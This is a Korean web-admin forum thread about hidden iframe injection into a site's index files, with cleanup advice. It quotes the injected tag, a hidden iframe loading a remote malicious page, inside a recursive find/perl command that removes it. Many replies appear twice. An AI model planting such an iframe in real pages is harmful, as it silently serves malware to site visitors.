각 index 파일마다 iframe 삽입문제여; 정보
각 index 파일마다 iframe 삽입문제여;
본문
계정비밀번호도 변경하고
DB비밀번호도 변경하고
지속적으로 바이러스도 검사해주고,,
SFTP로만 접속하는데
이번에 또 iframe 삽입되버리네요 -_ -;;
텔넷은 사용방법을 잘 몰라서,,
제가 일일이 손수 지울려고하는데
각 파일 경로들 알고 계신분 좀 알려주세요,
아님 텔넷 사용법이라도 ``;;?
DB비밀번호도 변경하고
지속적으로 바이러스도 검사해주고,,
SFTP로만 접속하는데
이번에 또 iframe 삽입되버리네요 -_ -;;
텔넷은 사용방법을 잘 몰라서,,
제가 일일이 손수 지울려고하는데
각 파일 경로들 알고 계신분 좀 알려주세요,
아님 텔넷 사용법이라도 ``;;?
댓글 전체
http://sir.co.kr/bbs/tb.php/g4_qa/134900
보시면
find . -type f -exec perl -pi -e 's|<iframe src="http://3b9.ru:8080/index.php" width=148 height=146 style="visibility: hidden">||g' {} \;
요렇게 해보시라고 되있네요
보시면
find . -type f -exec perl -pi -e 's|<iframe src="http://3b9.ru:8080/index.php" width=148 height=146 style="visibility: hidden">||g' {} \;
요렇게 해보시라고 되있네요
putty 로 텔넷 체크 하고 제 도메인주소 쓰면,
검은도스창이 하나뜨는데, 거기서 저 위에글 다 쓰기도전에 뚱~ 하면서 꺼져버리네요 -_ -;;
검은도스창이 하나뜨는데, 거기서 저 위에글 다 쓰기도전에 뚱~ 하면서 꺼져버리네요 -_ -;;
telnet 말고 ssh 로 해보세요
모토님 바이러스 잡았다고 했는데 결국 못잡았군요...
1. 본인컴터 바이러스 치료
2. ftp pass변경
3. 아이프레임찾아서 삭제(아래 일괄삭제 참조)
n. 위처럼 해놓고 몇일 보다가 아이프레임 또 생성되면 호스팅업체에 계정변경요청
아이프레임 소스찾아서 삭제하실 때 수작업으로 찾으면 답도 안나오고 완벽하지도 않죠...
루트에서 실행하세요. 루트이하 파일을 검색해 아이프레임들어가 있는 부분을 삭제하는 명령입니다.
find . -type f -exec perl -pi -e 's|<iframe src="http://3b9.ru:8080/index.php" width=148 height=146 style="visibility: hidden">||g' {} \;
여기까지 했는데 또 iFrame injection 걸리셨다면
3번 실행을 완벽하게 하지 못한 경우 일겁니다.
위의 명령으로 해보고 몇일 기다렸다가(대부분 저렇게 하면 잡힙니다) 그래도 안되면
호스팅업체에 계정변경신청을 해서 깔끔하게 새로 시작하시면 됩니다.
계정변경신청시 사이트 옮겨 달라고 하시면 알아서 옮겨줍니다.
단, 아이프레임은 싹 지우셔야겠죠...
1. 본인컴터 바이러스 치료
2. ftp pass변경
3. 아이프레임찾아서 삭제(아래 일괄삭제 참조)
n. 위처럼 해놓고 몇일 보다가 아이프레임 또 생성되면 호스팅업체에 계정변경요청
아이프레임 소스찾아서 삭제하실 때 수작업으로 찾으면 답도 안나오고 완벽하지도 않죠...
루트에서 실행하세요. 루트이하 파일을 검색해 아이프레임들어가 있는 부분을 삭제하는 명령입니다.
find . -type f -exec perl -pi -e 's|<iframe src="http://3b9.ru:8080/index.php" width=148 height=146 style="visibility: hidden">||g' {} \;
여기까지 했는데 또 iFrame injection 걸리셨다면
3번 실행을 완벽하게 하지 못한 경우 일겁니다.
위의 명령으로 해보고 몇일 기다렸다가(대부분 저렇게 하면 잡힙니다) 그래도 안되면
호스팅업체에 계정변경신청을 해서 깔끔하게 새로 시작하시면 됩니다.
계정변경신청시 사이트 옮겨 달라고 하시면 알아서 옮겨줍니다.
단, 아이프레임은 싹 지우셔야겠죠...
위에 증상은 악성코드 주소 삽입시마다 다르기때문에 당하시는 분마다 주소가 다틀립니다.
근간 1달내내 당해서 조금 아는데요 당할때마다 다르고요 ..
저건 저 코드를 어떻게 지우던 상관없습니다. 몇번이고 지워도 다시 생긴다는거죠..
ftp변경 해도 계속 당합니다. 해외아이피 차단해도 소용없습니다. 국내아이피로 돌아들어오니깐요
이유는 바꾸는 컴퓨터와접속하는 컴퓨터가 해킹을 당하고있습니다.
저희 회사 컴퓨터와 집컴퓨터를 차례대로 포맷을했습니다. 그것때문은 아닌데 다른바이러스때문에
어쩔수없이 포맷하게 되어 했습니다. 그리고 그사이트를 한곳에서만 오픈해보고 문제가있으믄 한컴퓨터에서만 작업했습니다.
집에 있는 거는 포맷안했습니다.
시작프로그램(msconfig)와 윈도우키(시작) 에 있는 시작프로그램 도 확인해보시고 이상하고 알수없는
파일 모두 삭제 하시고 프로그램추가/삭제 에서도 모두 삭제..
알약과 안철수 v3를 상세검색으로 모두 악성코드를 다 잡고 작업했습니다.
지금 이상태가 4일넘었는데 다시 위와 같은 해킹을 당하지 않고있습니다.
저코드는 악성코드를 받아 지속적으로 비밀번호를 전송한다는 코드라고해서 저처럼 처리하시는게
나을듯합니다.
근간 1달내내 당해서 조금 아는데요 당할때마다 다르고요 ..
저건 저 코드를 어떻게 지우던 상관없습니다. 몇번이고 지워도 다시 생긴다는거죠..
ftp변경 해도 계속 당합니다. 해외아이피 차단해도 소용없습니다. 국내아이피로 돌아들어오니깐요
이유는 바꾸는 컴퓨터와접속하는 컴퓨터가 해킹을 당하고있습니다.
저희 회사 컴퓨터와 집컴퓨터를 차례대로 포맷을했습니다. 그것때문은 아닌데 다른바이러스때문에
어쩔수없이 포맷하게 되어 했습니다. 그리고 그사이트를 한곳에서만 오픈해보고 문제가있으믄 한컴퓨터에서만 작업했습니다.
집에 있는 거는 포맷안했습니다.
시작프로그램(msconfig)와 윈도우키(시작) 에 있는 시작프로그램 도 확인해보시고 이상하고 알수없는
파일 모두 삭제 하시고 프로그램추가/삭제 에서도 모두 삭제..
알약과 안철수 v3를 상세검색으로 모두 악성코드를 다 잡고 작업했습니다.
지금 이상태가 4일넘었는데 다시 위와 같은 해킹을 당하지 않고있습니다.
저코드는 악성코드를 받아 지속적으로 비밀번호를 전송한다는 코드라고해서 저처럼 처리하시는게
나을듯합니다.
인덱스 변조의 경우... 가장문제가 감염된 컴퓨터가 재 접속시 동일한 현상이 또 발생하는다는것입니다. 그리고, 무엇보다 find 로 http://3b9.ru:8080/index.php를 검색해서 삭제를 하여도 변경된 주소나 포트, 아이피를 우회를 대부분하기 때문에 항상 일치하는 결과값을 받을 수 없습니다. 단순하게 해당 파일 찾아서 지우면 해결되었다고 생각을 할지라도 혹여 감염된 파일하나 내 컴퓨터에 있는것 다시 업로드하면 또 동일한 현상이 생깁니다. 귀찮더라도 전체 웹페이지 다 내려서 일반적인 점검을 다하고.. 그러고 난 뒤 각 페이지 열어서 iframe 삽인된것들 다시 재점검하여야 합니다.
무엇보다 앞에서 말한 감염 컴퓨터의 재제가 제일 필요합니니다. 우선 안정적이고 처리율이 높은 백신들을 이용하여 전체 바이러스, 해킹툴, 백도어 등 모든것들을 클리어하게 제거하는것이 기본이구요 어떤 FTP을 이용하든 비번저장을 이용하지 않는것이 좋습니다. 일반적인 툴들이 침입하는 경로가 본인 컴퓨터의 취약점을 이용하여 서버로 우회접근하는것은 기본이니까요.
어느정도 자신의 컴퓨터와 서버의 파일점검이 마무리되면 서비스하는 서버의 환경을 점검해주는것입니다.
FTP는 SFTP로 전환하고 계정 설정을 가능한 변경을 하되 비번 변경은 필수입니다. FTP의 경우 포트를 변경하는것 또한 기본입니다. SSH를 이용할 경우 FTP와 보안쉘 두가지가 오픈되는데 보안쉘 경로를 이용해서도 FTP접근이 가능합니다. 해서 SFTP전향 뿐만 아니라 계정설정변경도 필요로 하는것이죠.
그리고 나서 대부분의 파일들, 서비스를 하는 html, php, 디렉토리 등 퍼미션을 확인합니다. 퍼미션을 최소 수정가능한 형태로 변경하는것이 기본입니다.
해킹의 기본은 나로부터 시작이 됩니다. 누가 관리를 소흘히 해서 서버가 문제가 생겼다가 아니라 자신부터 비번이나 컴퓨터 관리를 잘하는데 부터 보안은 시작이 됩니다. 서버에 접근할 수 있는 권한을 가진 사람은 관리자부터이니까요.
무엇보다 앞에서 말한 감염 컴퓨터의 재제가 제일 필요합니니다. 우선 안정적이고 처리율이 높은 백신들을 이용하여 전체 바이러스, 해킹툴, 백도어 등 모든것들을 클리어하게 제거하는것이 기본이구요 어떤 FTP을 이용하든 비번저장을 이용하지 않는것이 좋습니다. 일반적인 툴들이 침입하는 경로가 본인 컴퓨터의 취약점을 이용하여 서버로 우회접근하는것은 기본이니까요.
어느정도 자신의 컴퓨터와 서버의 파일점검이 마무리되면 서비스하는 서버의 환경을 점검해주는것입니다.
FTP는 SFTP로 전환하고 계정 설정을 가능한 변경을 하되 비번 변경은 필수입니다. FTP의 경우 포트를 변경하는것 또한 기본입니다. SSH를 이용할 경우 FTP와 보안쉘 두가지가 오픈되는데 보안쉘 경로를 이용해서도 FTP접근이 가능합니다. 해서 SFTP전향 뿐만 아니라 계정설정변경도 필요로 하는것이죠.
그리고 나서 대부분의 파일들, 서비스를 하는 html, php, 디렉토리 등 퍼미션을 확인합니다. 퍼미션을 최소 수정가능한 형태로 변경하는것이 기본입니다.
해킹의 기본은 나로부터 시작이 됩니다. 누가 관리를 소흘히 해서 서버가 문제가 생겼다가 아니라 자신부터 비번이나 컴퓨터 관리를 잘하는데 부터 보안은 시작이 됩니다. 서버에 접근할 수 있는 권한을 가진 사람은 관리자부터이니까요.
다들 좋은답변 달아주셔서 -_ -;;
누구를 채택해야될지 ㅠㅠ
누구를 채택해야될지 ㅠㅠ